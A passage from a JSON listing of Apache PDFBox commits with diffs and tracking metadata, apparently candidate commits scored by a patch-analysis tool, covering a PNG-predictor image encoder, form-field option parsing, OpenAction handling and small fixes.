java.io.ByteArrayOutputStream;", - " import java.io.IOException;", - "+import java.io.OutputStream;", - "+import java.util.Arrays;", - "+import java.util.zip.Deflater;", - "+import java.util.zip.DeflaterOutputStream;", - " import javax.imageio.stream.MemoryCacheImageOutputStream;", - " import org.apache.pdfbox.cos.COSDictionary;", - "+import org.apache.pdfbox.cos.COSInteger;", - " import org.apache.pdfbox.cos.COSName;", - "@@ -29,2 +39,3 @@ import org.apache.pdfbox.pdmodel.PDDocument;", - " import org.apache.pdfbox.pdmodel.graphics.color.PDColorSpace;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceCMYK;", - " import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceColorSpace;", - "@@ -32,2 +43,3 @@ import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceGray;", - " import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceRGB;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDICCBased;", - "@@ -40,2 +52,7 @@ public final class LosslessFactory", - " {", - "+ /** ", - "+ * Internal, only for benchmark purpose", - "+ */", - "+ static boolean usePredictorEncoder = true;", - "+", - " private LosslessFactory()", - "@@ -43,3 +60,3 @@ public final class LosslessFactory", - " }", - "- ", - "+", - " /**", - "@@ -62,4 +79,15 @@ public final class LosslessFactory", - " {", - "+ // We try to encode the image with predictor", - "+ if (usePredictorEncoder)", - "+ {", - "+ PDImageXObject pdImageXObject = new PredictorEncoder(document, image).encode();", - "+ if (pdImageXObject != null)", - "+ {", - "+ return pdImageXObject;", - "+ }", - "+ }", - "+", - "+ // Fallback: We export the image as 8-bit sRGB and might loose color information", - " return createFromRGBImage(image, document);", - "- } ", - "+ }", - " }", - "@@ -192,2 +220,457 @@ public final class LosslessFactory", - "+ private static class PredictorEncoder", - "+ {", - "+ private final PDDocument document;", - "+ private final BufferedImage image;", - "+ private final int componentsPerPixel;", - "+ private final int transferType;", - "+ private final int bytesPerComponent;", - "+ private final int bytesPerPixel;", - "+", - "+ private final int height;", - "+ private final int width;", - "+", - "+ private final byte[] dataRawRowNone;", - "+ private final byte[] dataRawRowSub;", - "+ private final byte[] dataRawRowUp;", - "+ private final byte[] dataRawRowAverage;", - "+ private final byte[] dataRawRowPaeth;", - "+", - "+ final int imageType;", - "+ final boolean hasAlpha;", - "+ final byte[] alphaImageData;", - "+", - "+ final byte[] aValues;", - "+ final byte[] cValues;", - "+ final byte[] bValues;", - "+ final byte[] xValues;", - "+ final byte[] tmpResultValues;", - "+", - "+ /**", - "+ * Initialize the encoder and set all final fields", - "+ */", - "+ PredictorEncoder(PDDocument document, BufferedImage image)", - "+ {", - "+ this.document = document;", - "+ this.image = image;", - "+", - "+ // The raw count of components per pixel including optional alpha", - "+ this.componentsPerPixel = image.getColorModel().getNumComponents();", - "+ this.transferType = image.getRaster().getTransferType();", - "+ this.bytesPerComponent = (transferType == DataBuffer.TYPE_SHORT", - "+ || transferType == DataBuffer.TYPE_USHORT) ? 2 : 1;", - "+", - "+ // Only the bytes we need in the output (excluding alpha)", - "+ this.bytesPerPixel = image.getColorModel().getNumColorComponents() * bytesPerComponent;", - "+", - "+ this.height = image.getHeight();", - "+ this.width = image.getWidth();", - "+ this.imageType = image.getType();", - "+ this.hasAlpha = image.getColorModel().getNumComponents() != image.getColorModel()", - "+ .getNumColorComponents();", - "+ this.alphaImageData = hasAlpha ? new byte[width * height * bytesPerComponent] : null;", - "+", - "+ // The rows have 1-byte encoding marker and width * BYTES_PER_PIXEL pixel-bytes", - "+ int dataRowByteCount = width * bytesPerPixel + 1;", - "+ this.dataRawRowNone = new byte[dataRowByteCount];", - "+ this.dataRawRowSub = new byte[dataRowByteCount];", - "+ this.dataRawRowUp = new byte[dataRowByteCount];", - "+ this.dataRawRowAverage = new byte[dataRowByteCount];", - "+ this.dataRawRowPaeth = new byte[dataRowByteCount];", - "+", - "+ // Write the encoding markers", - "+ dataRawRowNone[0] = 0;", - "+ dataRawRowSub[0] = 1;", - "+ dataRawRowUp[0] = 2;", - "+ dataRawRowAverage[0] = 3;", - "+ dataRawRowPaeth[0] = 4;", - "+", - "+ // c | b", - "+ // -----", - "+ // a | x", - "+ //", - "+ // x => current pixel", - "+ this.aValues = new byte[bytesPerPixel];", - "+ this.cValues = new byte[bytesPerPixel];", - "+ this.bValues = new byte[bytesPerPixel];", - "+ this.xValues = new byte[bytesPerPixel];", - "+ this.tmpResultValues = new byte[bytesPerPixel];", - "+ }", - "+", - "+ /**", - "+ * Tries to compress the image using a predictor.", - "+ *", - "+ * @return the image or null if it is not possible to encoded the image (e.g. not supported", - "+ * raster format etc.)", - "+ */", - "+ PDImageXObject encode() throws IOException", - "+ {", - "+ Raster imageRaster = image.getRaster();", - "+ final int elementsInRowPerPixel;", - "+", - "+ // This variable store a row of the image each, the exact type depends", - "+ // on the image encoding. Can be a int[], short[] or byte[]", - "+ Object prevRow, transferRow;", - "+", - "+ switch (imageType)", - "+ {", - "+ case BufferedImage.TYPE_CUSTOM:", - "+ {", - "+ switch (imageRaster.getTransferType())", - "+ {", - "+ case DataBuffer.TYPE_USHORT:", - "+ elementsInRowPerPixel = componentsPerPixel;", - "+ prevRow = new short[width * elementsInRowPerPixel];", - "+ transferRow = new short[width * elementsInRowPerPixel];", - "+ break;", - "+ case DataBuffer.TYPE_BYTE:", - "+ elementsInRowPerPixel = componentsPerPixel;", - "+ prevRow = new byte[width * elementsInRowPerPixel];", - "+ transferRow = new byte[width * elementsInRowPerPixel];", - "+ break;", - "+ default:", - "+ return null;", - "+ }", - "+ break;", - "+ }", - "+", - "+ case BufferedImage.TYPE_3BYTE_BGR:", - "+ case BufferedImage.TYPE_4BYTE_ABGR:", - "+ {", - "+ elementsInRowPerPixel = componentsPerPixel;", - "+ prevRow = new byte[width * elementsInRowPerPixel];", - "+ transferRow = new byte[width * elementsInRowPerPixel];", - "+ break;", - "+ }", - "+", - "+ case BufferedImage.TYPE_INT_BGR:", - "+ case BufferedImage.TYPE_INT_ARGB:", - "+ case BufferedImage.TYPE_INT_RGB:", - "+ {", - "+ elementsInRowPerPixel = 1;", - "+ prevRow = new int[width * elementsInRowPerPixel];", - "+ transferRow = new int[width * elementsInRowPerPixel];", - "+ break;", - "+ }", - "+", - "+ default:", - "+ // We can not handle this unknown format", - "+ return null;", - "+ }", - "+", - "+ final int elementsInTransferRow = width * elementsInRowPerPixel;", - "+", - "+ // pre-size the output stream to half of the maximum size", - "+ ByteArrayOutputStream stream = new ByteArrayOutputStream(", - "+ height * width * bytesPerPixel / 2);", - "+ Deflater deflater = new Deflater(Filter.getCompressionLevel());", - "+ DeflaterOutputStream zip = new DeflaterOutputStream(stream, deflater);", - "+", - "+ int alphaPtr = 0;", - "+", - "+ for (int rowNum = 0; rowNum < height; rowNum++)", - "+ {", - "+ imageRaster.getDataElements(0, rowNum, width, 1, transferRow);", - "+", - "+ // We start to write at index one, as the predictor marker is in index zero", - "+ int writerPtr = 1;", - "+ Arrays.fill(aValues, (byte) 0);", - "+ Arrays.fill(cValues, (byte) 0);", - "+", - "+ final byte[] transferRowByte;", - "+ final byte[] prevRowByte;", - "+ final int[] transferRowInt;", - "+ final int[] prevRowInt;", - "+ final short[] transferRowShort;", - "+ final short[] prevRowShort;", - "+", - "+ if (transferRow instanceof byte[])", - "+ {", - "+ transferRowByte = (byte[]) transferRow;", - "+ prevRowByte = (byte[]) prevRow;", - "+ transferRowInt = prevRowInt = null;", - "+ transferRowShort = prevRowShort = null;", - "+ }", - "+ else if (transferRow instanceof int[])", - "+ {", - "+ transferRowInt = (int[]) transferRow;", - "+ prevRowInt = (int[]) prevRow;", - "+ transferRowShort = prevRowShort = null;", - "+ transferRowByte = prevRowByte = null;", - "+ }", - "+ else", - "+ {", - "+ // This must be short[]", - "+ transferRowShort = (short[]) transferRow;", - "+ prevRowShort = (short[]) prevRow;", - "+ transferRowInt = prevRowInt = null;", - "+ transferRowByte = prevRowByte = null;", - "+ }", - "+", - "+ for (int indexInTransferRow = 0; indexInTransferRow < elementsInTransferRow;", - "+ indexInTransferRow += elementsInRowPerPixel, alphaPtr += bytesPerComponent)", - "+ {", - "+ // Copy the pixel values into the byte array", - "+ if (transferRowByte != null)", - "+ {", - "+ copyImageBytes(transferRowByte, indexInTransferRow, xValues, alphaImageData,", - "+ alphaPtr);", - "+ copyImageBytes(prevRowByte, indexInTransferRow, bValues, null, 0);", - "+ }", - "+ else if (transferRowInt != null)", - "+ {", - "+ copyIntToBytes(transferRowInt, indexInTransferRow, xValues, alphaImageData,", - "+ alphaPtr);", - "+ copyIntToBytes(prevRowInt, indexInTransferRow, bValues, null, 0);", - "+ }", - "+ else", - "+ {", - "+ // This must be short[]", - "+ copyShortsToBytes(transferRowShort, indexInTransferRow, xValues, alphaImageData, alphaPtr);", - "+ copyShortsToBytes(prevRowShort, indexInTransferRow, bValues, null, 0);", - "+ }", - "+", - "+ // Encode the pixel values in the different encodings", - "+ int length = xValues.length;", - "+ for (int bytePtr = 0; bytePtr < length; bytePtr++)", - "+ {", - "+ int x = xValues[bytePtr] & 0xFF;", - "+ int a = aValues[bytePtr] & 0xFF;", - "+ int b = bValues[bytePtr] & 0xFF;", - "+ int c = cValues[bytePtr] & 0xFF;", - "+ dataRawRowNone[writerPtr] = (byte) x;", - "+ dataRawRowSub[writerPtr] = pngFilterSub(x, a);", - "+ dataRawRowUp[writerPtr] = pngFilterUp(x, b);", - "+ dataRawRowAverage[writerPtr] = pngFilterAverage(x, a, b);", - "+ dataRawRowPaeth[writerPtr] = pngFilterPaeth(x, a, b, c);", - "+ writerPtr++;", - "+ }", - "+", - "+ // We shift the values into the prev / upper left values for the next pixel", - "+ System.arraycopy(xValues, 0, aValues, 0, bytesPerPixel);", - "+ System.arraycopy(bValues, 0, cValues, 0, bytesPerPixel);", - "+ }", - "+", - "+ byte[] rowToWrite = chooseDataRowToWrite();", - "+", - "+ // Write and compress the row as long it is hot (CPU cache wise)", - "+ zip.write(rowToWrite, 0, rowToWrite.length);", - "+", - "+ {", - "+ // We swap prev and transfer row, so that we have the prev row for the next row.", - "+ Object temp = prevRow;", - "+ prevRow = transferRow;", - "+ transferRow = temp;", - "+ }", - "+ }", - "+ zip.close();", - "+ deflater.end();", - "+", - "+ return preparePredictorPDImage(stream, bytesPerComponent * 8);", - "+ }", - "+", - "+ private void copyIntToBytes(int[] transferRow, int indexInTranferRow, byte[] targetValues,", - "+ byte[] alphaImageData, int alphaPtr)", - "+ {", - "+ int val = transferRow[indexInTranferRow];", - "+ byte b0 = (byte) ((val & 0xFF));", - "+ byte b1 = (byte) ((val >> 8) & 0xFF);", - "+ byte b2 = (byte) ((val >> 16) & 0xFF);", - "+", - "+ switch (imageType)", - "+ {", - "+ case BufferedImage.TYPE_INT_BGR:", - "+ {", - "+ targetValues[0] = b0;", - "+ targetValues[1] = b1;", - "+ targetValues[2] = b2;", - "+ break;", - "+ }", - "+ case BufferedImage.TYPE_INT_ARGB:", - "+ {", - "+ targetValues[0] = b2;", - "+ targetValues[1] = b1;", - "+ targetValues[2] = b0;", - "+ if (alphaImageData != null)", - "+ {", - "+ byte b3 = (byte) ((val >> 24) & 0xFF);", - "+ alphaImageData[alphaPtr] = b3;", - "+ }", - "+ break;", - "+ }", - "+ case BufferedImage.TYPE_INT_RGB:", - "+ targetValues[0] = b2;", - "+ targetValues[1] = b1;", - "+ targetValues[2] = b0;", - "+ break;", - "+ }", - "+ }", - "+", - "+ private void copyImageBytes(byte[] transferRow, int indexInTranferRow, byte[] targetValues,", - "+ byte[] alphaImageData, int alphaPtr)", - "+ {", - "+ System.arraycopy(transferRow, indexInTranferRow, targetValues, 0, targetValues.length);", - "+ if (alphaImageData != null)", - "+ {", - "+ alphaImageData[alphaPtr] = transferRow[indexInTranferRow + targetValues.length];", - "+ }", - "+ }", - "+", - "+ private static void copyShortsToBytes(short[] transferRow, int indexInTranferRow,", - "+ byte[] targetValues, byte[] alphaImageData, int alphaPtr)", - "+ {", - "+ for (int i = 0; i < targetValues.length;)", - "+ {", - "+ short val = transferRow[indexInTranferRow++];", - "+ targetValues[i++] = (byte) ((val >> 8) & 0xFF);", - "+ targetValues[i++] = (byte) (val & 0xFF);", - "+ }", - "+ if (alphaImageData != null)", - "+ {", - "+ short alpha = transferRow[indexInTranferRow];", - "+ alphaImageData[alphaPtr] = (byte) ((alpha >> 8) & 0xFF);", - "+ alphaImageData[alphaPtr + 1] = (byte) (alpha & 0xFF);", - "+ }", - "+ }", - "+", - "+ private PDImageXObject preparePredictorPDImage(ByteArrayOutputStream stream,", - "+ int bitsPerComponent) throws IOException", - "+ {", - "+ int h = image.getHeight();", - "+ int w = image.getWidth();", - "+", - "+ ColorSpace srcCspace = image.getColorModel().getColorSpace();", - "+ PDColorSpace pdColorSpace = srcCspace.getType() != ColorSpace.TYPE_CMYK", - "+ ? PDDeviceRGB.INSTANCE : PDDeviceCMYK.INSTANCE;", - "+", - "+ // Encode the image profile if the image has one", - "+ if (srcCspace instanceof ICC_ColorSpace)", - "+ {", - "+ ICC_ColorSpace icc_colorSpace = (ICC_ColorSpace) srcCspace;", - "+ ICC_Profile profile = icc_colorSpace.getProfile();", - "+ // We only encode a color profile if it is not sRGB", - "+ if (profile != ICC_Profile.getInstance(ColorSpace.CS_sRGB))", - "+ {", - "+ PDICCBased pdProfile = new PDICCBased(document);", - "+ OutputStream outputStream = pdProfile.getPDStream()", - "+ .createOutputStream(COSName.FLATE_DECODE);", - "+ outputStream.write(profile.getData());", - "+ outputStream.close();", - "+ pdProfile.getPDStream().getCOSObject().setInt(COSName.N,", - "+ srcCspace.getNumComponents());", - "+ }", - "+ }", - "+", - "+ PDImageXObject imageXObject = new PDImageXObject(document,", - "+ new ByteArrayInputStream(stream.toByteArray()), COSName.FLATE_DECODE, w,", - "+ h, bitsPerComponent, pdColorSpace);", - "+", - "+ COSDictionary decodeParms = new COSDictionary();", - "+ decodeParms.setItem(COSName.BITS_PER_COMPONENT, COSInteger.get(bitsPerComponent));", - "+ decodeParms.setItem(COSName.PREDICTOR, COSInteger.get(15));", - "+ decodeParms.setItem(COSName.COLUMNS, COSInteger.get(w));", - "+ decodeParms.setItem(COSName.COLORS, COSInteger.get(srcCspace.getNumComponents()));", - "+ imageXObject.getCOSObject().setItem(COSName.DECODE_PARMS, decodeParms);", - "+", - "+ if (image.getTransparency() != Transparency.OPAQUE)", - "+ {", - "+ PDImageXObject pdMask = prepareImageXObject(document, alphaImageData,", - "+ image.getWidth(), image.getHeight(), 8 * bytesPerComponent, PDDeviceGray.INSTANCE);", - "+ imageXObject.getCOSObject().setItem(COSName.SMASK, pdMask);", - "+ }", - "+ return imageXObject;", - "+ }", - "+", - "+ /**", - "+ * We look which row encoding is the \"best\" one, ie. has the lowest sum. We don't implement", - "+ * anything fancier to choose the right row encoding. This is just the recommend algorithm", - "+ * in the spec. The get the perfect encoding you would need to do a brute force check how", - "+ * all the different encoded rows compress in the zip stream together. You have would have", - "+ * to check 5*image-height permutations...", - "+ *", - "+ * @return the \"best\" row encoding of the row encodings", - "+ */", - "+ private byte[] chooseDataRowToWrite()", - "+ {", - "+ byte[] rowToWrite = dataRawRowNone;", - "+ long estCompressSum = estCompressSum(dataRawRowNone);", - "+ long estCompressSumSub = estCompressSum(dataRawRowSub);", - "+ long estCompressSumUp = estCompressSum(dataRawRowUp);", - "+ long estCompressSumAvg = estCompressSum(dataRawRowAverage);", - "+ long estCompressSumPaeth = estCompressSum(dataRawRowPaeth);", - "+ if (estCompressSum > estCompressSumSub)", - "+ {", - "+ rowToWrite = dataRawRowSub;", - "+ estCompressSum = estCompressSumSub;", - "+ }", - "+ if (estCompressSum > estCompressSumUp)", - "+ {", - "+ rowToWrite = dataRawRowUp;", - "+ estCompressSum = estCompressSumUp;", - "+ }", - "+ if (estCompressSum > estCompressSumAvg)", - "+ {", - "+ rowToWrite = dataRawRowAverage;", - "+ estCompressSum = estCompressSumAvg;", - "+ }", - "+ if (estCompressSum > estCompressSumPaeth)", - "+ {", - "+ rowToWrite = dataRawRowPaeth;", - "+ }", - "+ return rowToWrite;", - "+ }", - "+", - "+ /*", - "+ * PNG Filters, see https://www.w3.org/TR/PNG-Filters.html", - "+ */", - "+ private static byte pngFilterSub(int x, int a)", - "+ {", - "+ return (byte) ((x & 0xFF) - (a & 0xFF));", - "+ }", - "+", - "+ private static byte pngFilterUp(int x, int b)", - "+ {", - "+ // Same as pngFilterSub, just called with the prior row", - "+ return pngFilterSub(x, b);", - "+ }", - "+", - "+ private static byte pngFilterAverage(int x, int a, int b)", - "+ {", - "+ return (byte) (x - ((b + a) / 2));", - "+ }", - "+", - "+ private static byte pngFilterPaeth(int x, int a, int b, int c)", - "+ {", - "+ int p = a + b - c;", - "+ int pa = Math.abs(p - a);", - "+ int pb = Math.abs(p - b);", - "+ int pc = Math.abs(p - c);", - "+ final int Pr;", - "+ if (pa <= pb && pa <= pc)", - "+ {", - "+ Pr = a;", - "+ }", - "+ else if (pb <= pc)", - "+ {", - "+ Pr = b;", - "+ }", - "+ else", - "+ {", - "+ Pr = c;", - "+ }", - "+", - "+ int r = x - Pr;", - "+ return (byte) (r);", - "+ }", - "+", - "+ private static long estCompressSum(byte[] dataRawRowSub)", - "+ {", - "+ long sum = 0;", - "+ for (byte aDataRawRowSub : dataRawRowSub)", - "+ {", - "+ sum += aDataRawRowSub & 0xFF;", - "+ }", - "+ return sum;", - "+ }", - "+ }", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4184": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "faeb110e8ded732ba776cd27bb95a7c38c0c2202" - ] - ], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4184", - "relevance": 2 - } - ] - }, - { - "commit_id": "6285b5369cfdcc4ec876a53e93b3f6d98061ebe8", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532244884, - "hunks": 1, - "message": "PDFBOX-4071: use current version git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836423 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/pom.xml b/examples/pom.xml", - "index f20dc274c..6201cf029 100644", - "--- a/examples/pom.xml", - "+++ b/examples/pom.xml", - "@@ -79,3 +79,3 @@", - " ant", - "- 1.9.9", - "+ 1.10.5", - " " - ], - "changed_files": [ - "examples/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "7671e388a8f7989664f3dfceaac20d3e47455052" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "9fb0e579405d5780eee4a7f31ba7c5459cc59e37", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523114251, - "hunks": 4, - "message": "PDFBOX-4185: support COSString, COSArray mixed options entries git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1828595 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/FieldUtils.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/FieldUtils.java", - "index 1872e3a20..58816b3e0 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/FieldUtils.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/FieldUtils.java", - "@@ -27,3 +27,2 @@ import org.apache.pdfbox.cos.COSBase;", - " import org.apache.pdfbox.cos.COSString;", - "-import org.apache.pdfbox.pdmodel.common.COSArrayList;", - "@@ -177,34 +176,21 @@ public final class FieldUtils", - " {", - "- // test if there is a single text or a two-element array ", - "- COSBase entry = ((COSArray) items).get(0);", - "- if (entry instanceof COSString)", - "+ List entryList = new ArrayList(); ", - "+ for (COSBase entry : (COSArray) items)", - " {", - "- return COSArrayList.convertCOSStringCOSArrayToList((COSArray)items);", - "- } ", - "- else", - "- {", - "- return getItemsFromPair(items, pairIdx);", - "- } ", - "+ if (entry instanceof COSString)", - "+ {", - "+ entryList.add(((COSString) entry).getString());", - "+ }", - "+ else if (entry instanceof COSArray)", - "+ {", - "+ COSArray cosArray = (COSArray) entry;", - "+ if (cosArray.size() >= pairIdx +1 && cosArray.get(pairIdx) instanceof COSString)", - "+ {", - "+ entryList.add(((COSString) cosArray.get(pairIdx)).getString());", - "+ }", - "+ }", - "+ }", - "+ return entryList; ", - " }", - " return Collections.emptyList();", - "- } ", - "-", - "- /**", - "- * Return either one of a list of two-element arrays entries.", - "- *", - "- * @param items the array of elements or two-element arrays", - "- * @param pairIdx the index into the two-element array", - "- * @return a List of single elements", - "- */", - "- private static List getItemsFromPair(COSBase items, int pairIdx)", - "- {", - "- List exportValues = new ArrayList();", - "- int numItems = ((COSArray) items).size();", - "- for (int i=0;i> glyphIdToCharacterCodeMultiple = new HashMap<>();", - "- private Map characterCodeToGlyphId;", - "+ private Map characterCodeToGlyphId = new HashMap<>();" - ], - "changed_files": [ - "fontbox/src/main/java/org/apache/fontbox/ttf/CmapSubtable.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4230": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "72948ab4a0b57ad2a99900abaab54391cdaa6b16" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4230", - "relevance": 2 - } - ] - }, - { - "commit_id": "06a515b3ab42530c2238970b56b9bcd01e368528", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1526594362, - "hunks": 3, - "message": "PDFBOX-4204: ignore all illegal OpenAction types git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831819 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocumentCatalog.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocumentCatalog.java", - "index e3b1e6f84..2f841fc15 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocumentCatalog.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocumentCatalog.java", - "@@ -27,3 +27,2 @@ import org.apache.pdfbox.cos.COSArray;", - " import org.apache.pdfbox.cos.COSBase;", - "-import org.apache.pdfbox.cos.COSBoolean;", - " import org.apache.pdfbox.cos.COSDictionary;", - "@@ -254,18 +253,3 @@ public class PDDocumentCatalog implements COSObjectable", - " COSBase openAction = root.getDictionaryObject(COSName.OPEN_ACTION);", - "- if (openAction == null)", - "- {", - "- return null;", - "- }", - "- else if (openAction instanceof COSBoolean)", - "- {", - "- if (((COSBoolean) openAction).getValue() == false)", - "- {", - "- return null;", - "- }", - "- else", - "- {", - "- throw new IOException(\"Can't create OpenAction from COSBoolean\");", - "- }", - "- }", - "- else if (openAction instanceof COSDictionary)", - "+ if (openAction instanceof COSDictionary)", - " {", - "@@ -279,3 +263,3 @@ public class PDDocumentCatalog implements COSObjectable", - " {", - "- throw new IOException(\"Unknown OpenAction \" + openAction);", - "+ return null;", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocumentCatalog.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4204": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "59d19e8d97b8a84dfa6c06723fdc89814be99fb2" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4204", - "relevance": 2 - } - ] - }, - { - "commit_id": "4dad057da959ff794c4f89111336c7f2b519c2e7", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524334371, - "hunks": 1, - "message": "PDFBOX-4071: use KCMS when available git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829737 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/preflight/src/main/java/org/apache/pdfbox/preflight/Validator_A1b.java b/preflight/src/main/java/org/apache/pdfbox/preflight/Validator_A1b.java", - "index 29ea7159c..946ecd7ea 100644", - "--- a/preflight/src/main/java/org/apache/pdfbox/preflight/Validator_A1b.java", - "+++ b/preflight/src/main/java/org/apache/pdfbox/preflight/Validator_A1b.java", - "@@ -70,2 +70,13 @@ public class Validator_A1b", - "+ try", - "+ {", - "+ // force KCMS (faster than LCMS) if available", - "+ Class.forName(\"sun.java2d.cmm.kcms.KcmsServiceProvider\");", - "+ System.setProperty(\"sun.java2d.cmm\", \"sun.java2d.cmm.kcms.KcmsServiceProvider\");", - "+ }", - "+ catch (ClassNotFoundException e)", - "+ {", - "+ // ignore", - "+ }", - "+", - " // is output xml ?" - ], - "changed_files": [ - "preflight/src/main/java/org/apache/pdfbox/preflight/Validator_A1b.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "db088fa2a060b6cc900204488f27ea184e24d3e2" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "40b34e561c78b3b1dea86062376b69d0754fc14b", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529424072, - "hunks": 1, - "message": "PDFBOX-4242: fulfill the close() contract, as suggested by Emmeran Seehuber git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833857 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/RAFDataStream.java b/fontbox/src/main/java/org/apache/fontbox/ttf/RAFDataStream.java", - "index 7a199d9b1..0e54827cc 100644", - "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/RAFDataStream.java", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/RAFDataStream.java", - "@@ -98,4 +98,7 @@ class RAFDataStream extends TTFDataStream", - " {", - "- raf.close();", - "- raf = null;", - "+ if (raf != null)", - "+ {", - "+ raf.close();", - "+ raf = null;", - "+ }", - " }" - ], - "changed_files": [ - "fontbox/src/main/java/org/apache/fontbox/ttf/RAFDataStream.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4242": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "8db47637a885e9538bdf7a94b4686b0146ac0c20" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4242", - "relevance": 2 - } - ] - }, - { - "commit_id": "d06b05943f91cd56aa3e62641791dc5e1dda4ed9", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532246612, - "hunks": 1, - "message": "PDFBOX-4184: compare sizes of different strategies for small non 16 bit images git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836425 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "index a90175811..3b81dbe43 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "+++ 